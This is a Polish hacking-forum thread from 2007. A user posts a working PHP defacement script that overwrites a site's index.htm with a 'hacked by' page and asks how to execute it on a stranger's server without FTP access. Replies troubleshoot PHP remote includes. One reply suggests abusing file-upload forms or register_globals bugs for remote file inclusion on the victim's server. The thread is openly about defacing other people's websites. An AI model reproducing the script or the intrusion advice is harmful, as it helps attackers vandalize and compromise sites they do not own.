Pokaż wyniki 1 do 10 z 31

Temat: sql inj

Hybrid View

Previous Post Previous Post   Next Post Next Post
  1. #1
    Zarejestrowany
    Sep 2007
    Skąd
    Tu
    Postów
    1,236

    Domyślnie sql injection

    Cześć, wyskrobałem coś takiego:
    Kod:
    <?php
    $index = "index.htm";
    if (is_writeable($index))
      {
       if ($plik = fopen($index, "w+"))
         {
          if (fwrite($plik, "<html><body bgcolor=black><center><h1><font 
    color=red>hacked<br>by<br>quite<br>lame</font></center>"."
    "."</body></html>") !== FALSE) echo "__O.K__";
            else echo "Nie ok!";
          fclose($plik);
         } else echo "Nie ok.";
      } else echo "Nie ok."
      
    ?>
    Dziala, moje pytanie brzmi w jakie są metody wykonania tego kodu na obcym serwerze (nie przez ftp) ;P
    Ostatnio edytowane przez gogulas : 10-18-2007 - 18:19 Powód: kaprys
    http://gogulas.yoyo.pl/h.gif

  2. Domyślnie

    Nie wiem czy to coś pomoże, bo szczerze mówiąc nie chce mi się przeglądać tych videoartów, ale może tu coś będzie.

  3. #3
    Zarejestrowany
    Sep 2007
    Skąd
    Tu
    Postów
    1,236

    Domyślnie

    mi też się nie chce na dodatek nie mam kompa do video :/
    mam pytanko, odnosnie includowanai plikow z poza serwera, wyskakuje mi taki komunikat:

    Kod:
    Warning: main(www.gogulas.yoyo.pl/inc/lan.htm) [function.main]: failed to open stream: No such file or directory in /var/www/sites/yoyo.pl/g/o/gogulas/inc/index.php on line 23
    Kod:
    Warning: main() [function.include]: Failed opening 'www.gogulas.yoyo.pl/inc/lan.htm' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /var/www/sites/yoyo.pl/g/o/gogulas/inc/index.php on line 23
    Czy to znaczy że funkcja includowania z zewnatrz jest na tym serwerze zablokowana? jesli to tak jest szansa na include z tego samego serwera tylko ze z innego konta?
    http://gogulas.yoyo.pl/h.gif

  4. Domyślnie

    nie mam kompa do video
    Może mały offtop, ale tak na przyszłość...

    Geexbox - Linux LiveCD - odtwarzacz multimediów - obrz ISO zajmuje 7MB i odtwarza praktycznie każdy tym plików multimedialnych. Na jakiejś imprezce dzięki temu na staaarym kompie koleżanki oglądaliśmy filmy na spokojnie. I mozna zapisać na CD, Mini-CD i BuissnesCard.

  5. #5
    Zarejestrowany
    Jun 2006
    Skąd
    rand(.eu)
    Postów
    8,748

    Domyślnie

    Fajny off-top i moze sie przydac

    @gogulas - a moze podalys co to za usluga? www.blablabla.pl to plik lokalny a http://www.blablabla.pl to juz zdalna lokalizacja.
    ctrl-alt-del.cc - soft reset site for IT admins and other staff :-)

  6. #6
    Zarejestrowany
    Sep 2007
    Skąd
    Tu
    Postów
    1,236

    Domyślnie

    humm chyba sie leciutko nie rozumiemy, piszac "nie przez ftp" mialem na mysli forme ataku ktora nie wymagala by recznego wgrania tego liku na konto ofiary po czym uruchomiania z linku bo majac dostep do ftp moglbym... zreszta nie wazne, tak gwoli wyjasnienia to pisze

    w kodzie mam:
    Kod:
    <?php 
    include('www.gogulas.yoyo.pl/inc/lan.htm'); 
    ?>
    i wyskakuje powyzszy blad, jesli dam
    Kod:
    <?php 
    include('lan.htm'); 
    ?>
    to oczywiscie wszystko gra, plik sie dodaje do zawartosci strony, mozna na to cos poradzic?

    P.S.X
    my cpu info:
    cel 466 up2 525
    no sound cart
    so no way to play any video....
    http://gogulas.yoyo.pl/h.gif

  7. #7
    Zarejestrowany
    Jun 2006
    Skąd
    rand(.eu)
    Postów
    8,748

    Domyślnie

    Jesli nie mozesz zaladowac pliku przez FTP to moze serwer ma:
    - file upload przez strone - wgraj swoj kod i jazda
    - blad ze zmiennymi globalnymi w sofcie ktorego uzywa - remote file include
    ... a dalej kombinacje powyzszych i nieco fantazji
    ctrl-alt-del.cc - soft reset site for IT admins and other staff :-)

Podobne wątki

  1. Excel -> SQL
    By TQM in forum Perl/Python/TCL/Prolog
    Odpowiedzi: 8
    Autor: 04-18-2011, 16:25
  2. sql injection
    By ble34 in forum Security
    Odpowiedzi: 7
    Autor: 06-13-2007, 16:45
  3. ADOdb a SQL Injection
    By prawie jak haker in forum Hacking
    Odpowiedzi: 1
    Autor: 06-10-2007, 12:35
  4. pomocy z zapytaniem SQL :)
    By mendi in forum Newbie - dla początkujących!
    Odpowiedzi: 2
    Autor: 04-29-2007, 13:55
  5. zastrzyki sql
    By ble34 in forum Newbie - dla początkujących!
    Odpowiedzi: 20
    Autor: 11-04-2006, 23:14

Zasady Postowania

  • Nie możesz zakładać nowych tematów
  • Nie możesz pisać wiadomości
  • Nie możesz dodawać załączników
  • Nie możesz edytować swoich postów
  •  
Subskrybuj